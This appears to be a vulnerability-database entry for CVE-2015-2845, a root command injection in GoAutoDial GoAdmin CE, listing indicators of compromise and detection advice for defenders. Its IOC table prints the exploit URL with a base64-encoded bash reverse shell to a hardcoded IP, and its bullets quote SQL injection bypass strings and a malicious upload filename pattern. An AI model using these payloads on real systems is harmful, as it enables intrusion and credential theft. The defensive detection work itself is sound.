cbcvebase.
CVE-2015-2845
published 2015-05-12

CVE-2015-2845: The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion…

PriorityP179critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
71.69%
99.3th percentile
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion of the PATH_INFO.

Affected

2 ranges
VendorProductVersion rangeFixed in
goautodialgoadmin_ce
goautodialgoadmin_ce

Detection & IOCsextracted from sources · hover to see the quote

url/index.php/go_site/cpanel/|| bash -c "eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode`"
path/index.php/go_site/cpanel/
path/index.php/go_login/validate_credentials/
path/index.php/go_site/go_get_user_info/
path/sounds/go_bogus.wav.php
command|| bash -c "eval `echo -n <base64payload> | base64 --decode`"
path/changelog.txt
path/var/lib/asterisk/sounds
process/usr/share/goautodial/goautodialc.pl
  • Detect command injection attempts in PATH_INFO targeting the cpanel function: look for URL-encoded pipe/shell metacharacters (e.g., %7C%7C, ||) followed by base64-encoded payloads in requests to /index.php/go_site/cpanel/
  • Detect SQLi authentication bypass: POST to /index.php/go_login/validate_credentials with user_pass containing URL-encoded SQL injection string '%20or%20'1'%3D'1' or literal ' OR '1'='1
  • Detect SQLi data exfiltration: GET request to /index.php/go_site/go_get_user_info/ with PATH_INFO containing ' OR active='Y to dump admin credentials from the database
  • Detect version check reconnaissance: unauthenticated GET request to /changelog.txt; a response body NOT containing '1421902800' indicates a vulnerable GoAutoDial instance
  • Detect malicious file upload: filenames matching the pattern go_*.wav.php uploaded to the audiostore endpoint, exploiting insufficient extension validation
  • Monitor execution of /usr/share/goautodial/goautodialc.pl with unexpected arguments containing shell metacharacters (||, &&, ;) as this is the underlying exec target for the command injection
  • The Metasploit module uses User-Agent 'Mozilla/5.0' with Accept-Encoding 'identity' across all exploit requests; correlate this UA with the specific attack URIs for higher-fidelity detection
  • ·The command injection PoC uses a hardcoded attacker IP (192.168.0.11) and port (4444) in the base64 payload; real-world attacks will use different IPs/ports encoded in base64, so detections must decode and inspect base64 blobs rather than matching the literal example IP
  • ·The Metasploit module hardcodes the payload as a base64-encoded reverse-tcp bash one-liner; the handler must be configured for cmd/unix/reverse_bash to receive the connection
  • ·Any GoAutoDial 3.3 version between 3.3-1406088000 and 3.3-1421902800 may be vulnerable; the fixed version is 3.3-1421902800 identifiable via changelog.txt
  • ·Command injection is executed with root privileges, meaning post-exploitation activity will appear as root; process lineage from goautodialc.pl to bash should be treated as high severity
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.